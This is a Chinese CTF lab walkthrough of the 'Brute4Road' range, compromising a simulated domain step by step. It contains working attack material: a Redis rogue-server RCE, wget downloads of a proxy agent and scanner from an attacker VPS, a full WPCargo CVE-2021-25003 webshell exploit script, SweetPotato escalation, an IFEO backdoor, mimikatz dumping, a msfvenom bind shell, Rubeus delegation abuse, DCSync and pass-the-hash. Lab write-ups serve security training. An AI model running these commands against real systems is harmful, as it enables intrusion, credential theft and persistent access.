Brute4Road

UID: 20240730152716
created: 2025-03-14 21:19
tags:
  - Redis主从复制RCE
  - 约束性委派
  - DCSync
  - 春秋云境
title: Brute4Road
OS: both
difficulty:
  - Easy
datePublished: 
image: https://g.ichunqiu.com/cloud_mirror/production/202208/f373ff22c9b9d633c7f894a3453639d0.png
author:
  - 霄壤实验室
comment: 
score: 8.8
scoreStar: 
updated: 2025-05-26 19:11

1. 知识点

Redis主从复制RCE
约束性委派
DCSync
3.PTH

2. 工具

Redis恶意服务端 GitHub - Dliv3/redis-rogue-server: Redis 4.x/5.x RCE
bloodhound AD域环境分析 Getting started with BloodHound Community Edition – BloodHound
Powerview.ps1 PowerSploit/Recon at master · PowerShellMafia/PowerSploit · GitHub
rubeus GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.
mimikatz Title Unavailable | Site Unreachable
蚁剑 Title Unavailable | Site Unreachable
域内武器化工具

3. flag01

fscan扫描
Pasted image 20250217112827
发现存在redis未授权访问
使用MDUT连接

3.1. Redis主从复制RCE

1.redis未授权利用方式 > 3.4. 主从复制RCE
采用主从模式获取RCE

python3 redis-rogue-server.py --rhost 39.98.109.170 --lhost 124.71.111.64

记得开放自己vps的21000端口
运行后可以获取到一个交互式shell

3.1.1. Redis提权（SUID检测）

find / -perm -4000 2>/dev/null

发现base64存在SUID权限
Pasted image 20250217114713

base64读取flag

base64 "/home/redis/flag/flag01" | base64 --decode

Pasted image 20250217114627

4. flag02

4.1. 内网代理搭建

#控制端 
./linux_x64_admin -l 1122

#被控端
wget http://124.71.111.64/stowaway_agent
chmod +x stowaway_agent
./stowaway_agent -c 124.71.111.64:1122

#控制端
use 0
socks1123

4.2. 内网扫描

wget http://124.71.111.64/fscan
./fscan -h 172.22.2.7/24

目标信息

172.22.2.16  MSSQLSERVER.xiaorang.lab  mssql数据库服务器 
172.22.2.7   Redis                    已拿下
172.22.2.34  XIAORANG\CLIENT01
172.22.2.3    DC:DC.xiaorang.lab
172.22.2.18   WORKGROUP\UBUNTU-WEB02  wordspress网站 已拿下

4.3. wpscan扫描 wpcargo插件未授权RCE

然后用wpscan扫描下wordpress站点

proxychains wpscan --url http://172.22.2.18 --api-token xxx

发现WPCargo插件存在未授权RCE漏洞
Pasted image 20250217120133

用EXP打
WPCargo < 6.9.0 – Unauthenticated RCE | CVE 2021-25003 | Plugin Vulnerabilities

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

执行脚本后成功上马

测试效果

http://172.22.2.18/webshell.php?1=system
POST 2=whoami

Pasted image 20250217121148

4.4. 蚁剑连接数据库

注意连接类型选择正确
文件查看数据库配置文件，再内连接数据库

数据库里面找到flag02

这里给我们了一个提示，并给了一个字典。把他导出来
Pasted image 20250217123322

5. flag03

5.1. 数据库密码爆破

将上面的字典用Hydra爆破

proxychains -q hydra -l sa -P passwd.txt mssql://172.22.2.16

Pasted image 20250217123715
获取到了密码 ElGNkOiC

5.2. MDUT连接mssql数据库

查看权限发现当前用户存在 SeImpersonatePrivilege
那我们可以用 SweetPotato 进行提权
Pasted image 20250217124730

5.3. 数据库提权

激活组件后，即可上传文件
运行提权即可

C:/Users/Public/SweetPotato.exe

5.4. 新建管理员用户 RDP

发现3389开放，添加用户远程连接

C:/Users/Public/SweetPotato.exe -a "netstat -ano"

Pasted image 20250217132950
新建一个管理员用户

C:/Users/Public/SweetPotato.exe -a "net user  c1trus qwer123! /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators c1trus /add"

rdp连接
Pasted image 20250217133304
拿flag

5.5. 获取系统用户cmd

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

收集域内信息

sharphound.exe -c all

获取 mssqlserver$ 的hash

mimikatz.exe
privilege::debug
log 1.txt
sekurlsa::logonpasswords

5.6. MSF上线系统用户（可以不用做）

生成正向后门

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455 -f exe -o msf4455.exe

运行后门

C:/Users/Public/sweetpotato.exe -a C:/Users/Public/msf4455.exe

连接后门

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 172.22.2.16
set lport 4455
run

Pasted image 20250218210955

Fail

不知道为什么64位的连不上
Pasted image 20250218214524
导出不了凭证
Pasted image 20250218214749

6. flag04

发现我们再与里面

6.1. 约束委派攻击

里面可以找到 MSSQLSERVER$ 用户的hash密码，
Pasted image 20250217144427

查看 MSSQLSERVER$ 机器配置的委派服务

Import-Moudule PowerView.ps1
Get-DomainComputer -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto

可以发现 MSSQLSERVER$ 机器配置了到 DC LDAP 和 CIFS 服务的约束性委派
Pasted image 20250218223428
首先使用 Rubeus 与 MSSQLSERVER$ 的凭证向KDC(密钥分发中心)申请一个TGT(票据授权票据) 并用base64格式打印出来
fb485e69a4e0da60139181076daa010b

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:fb485e69a4e0da60139181076daa010b /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

Pasted image 20250217144516
然后通过 S4u2seflt 拓展协议使用 TGT 向 TGS(票据授予服务器) 请求代表 Administrator 用户访问 DC.xiaorang.lab 上的 LDAP 服务 的 ST(服务票据)
并导入内存当中

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE0VoSu71Dw3MPCQKpHs7oaZBga5pJJnTv2P1pTWFkbMVN18BBuBWf29xCUcj7+OT3gTjVrmYKnZWi5uPFANum/8Ul4MQTmudmWv6Y27/8UpJWZvzmb7T3dWHKpvtU72aC67zecBMATWQw/s+TaNXHO/5toSguUEPLp70Oa2gqA1ZEeNgN255twcI04HVRhmrq599RSvqgCpmvRBMkrHMeJiQcmZ2PmuHNxiRVtmZ4H/tcEUUC9AVseGF3s4FI1XuBKKsJvCHzSZqOQF/UrgweTryouiw0yxcS8JI+GHPApB/bF4pxESj81asfSrNxS4m9COVHhyWiWMq/JTWZ66ZTNtoAs90J4LuLfltHvitWKhRagg60tGtjzeGlwdKVJk7oadxS9UUpDRG9uBq4lW5KHnLqGGSazCPDlA2Lv+MraXSZSmfm3veQTlD5DpzRQeWhHZGfIlLUV07CA5F7VzGoPLYA0pHS1lRiAwp24sHojyXCRVNjI9dX8DUhxP+2dyX91ZDG8cxbTWCFD8G1S9yrsLyokGmLddBP0RtlRhoDVxUtlSuzFn7l6Gh7nbp6tsjA5mjOkaTgSqxzcqpfTDJz+qAJLz4NOfuMfeOoEmEu01sMJ/5Ldl2gk1g4gdrvshl/RJi1AXKgXIR0MRFVUmSRTnhzuwzKtHNesJzYhreW1epl8t8deb5PaJv7PMlLxeV4XW9SFA5KoSpWQNm78//cZ54ZLBkA39IUpxxp34xg28beoa+CjZVyGZauA9zuSIsDEZBrMocx8mNmcD4UTpqQGPz1FQMvdDpiNLkTqjvkXtZM8s1RkMiJpVzMoJQDvTuIVZ0JqM5EoXR8ebdGGJn5g8W1eO0YYa/rIMZpCvd4+hLLiv31jhlD/mv8RyVLZshjFgVbX2EVZE8SrUZbfuuHDPwBUCJQ6nn/0rlFf0VjeefTxrRP2f5zw7YBr2vW40Xq6KYGxyRvHVARL+5icf7TTWVMkP5gWka71ufIIsPbpuHSYzprtWRy7TVZ2IeFZ4We040hCiGxQhei/0PkAjzSYSNr08I6hkDiP3vJISgAAGWFwal+MBjUv1z0vCxbY3ESU2AdmLbiz9fGR7yEO0/cf65Thb91sfpucSaixusZKY7LfQ+4/yf4MQgBM9ILlNbZaAIFouY9FZEhZn7huTDmkr67JxUv8BWmWYkMVOS8IxYaoBhPeoxwsITgxsZqt8dcpbbmX+e/VXCAqdoIJAyftK0y9zIvfHorg27YcqXRpVVCxnf6gY8EORgIdIc8kaLAvW93Y8e0YKkRawGvQRM6Fra0Xo+qwRKMN4cuByFpOR/vCzHtcoX1WBI5ja7aWXmkFgMO79gnh45R4aj1pwEiX5BSo6lr/OJcjrLfmrm3dNh7Bc71Ww/GE9zxMY8bTXw3eTJ0C1nAdXSQ5nlApjaOe1D9RRql1OBWqV3mxV0wqlyR3eAw5xDjwaDSsO9P2jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAgKBu8AWtcaX0Kqvuw5Ga/oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDIxODE1NTMyMVqmERgPMjAyNTAyMTkwMTUzMjFapxEYDzIwMjUwMjI1MTU1MzIxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==【获取到的base64加密票据】

Pasted image 20250217144630

6.2. DCSync

我们获取到了LDAP 服务的ST后，就可以与域控进行交互了，并且可以借助mimikatz 进行DCSync攻击

lsadump::dcsync /domain:xiaorang.lab /user:Administrator

Pasted image 20250217144810
获取到域管理员的hash
1a19251fbd935969832616366ae3fe62

6.3. 3.PTH

proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3 -codec gbk

拿下flag